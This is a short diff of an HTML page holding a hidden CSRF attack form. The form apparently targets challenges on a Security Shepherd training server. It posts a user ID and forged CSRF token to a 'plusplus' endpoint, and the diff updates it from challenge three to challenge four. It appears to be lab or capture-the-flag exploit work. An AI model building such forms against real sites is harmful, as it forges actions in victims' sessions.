--- a/index.html
+++ b/index.html
@@ -5,9 +5,9 @@
     </head>
 
     <body>
-        <form id="csrf" action="https://shepherd.waratek.lan/user/csrfchallengethree/plusplus" method="POST" >
-            <input type="hidden" name="userid" value="fcab4e7dfbe01ce4e3904b97febe6a6a184302c3" />
-            <input type="hidden" name="csrfToken" value="-161699926159196303063208050832052286748" />
+        <form id="csrf" action="https://shepherd.waratek.lan/user/csrfchallengefour/plusplus" method="POST" >
+            <input type="hidden" name="userId" value="fcab4e7dfbe01ce4e3904b97febe6a6a184302c3" />
+            <input type="hidden" name="csrfToken" value="138480911391839065120583091695078570809" />
         </form>
 
         <script>
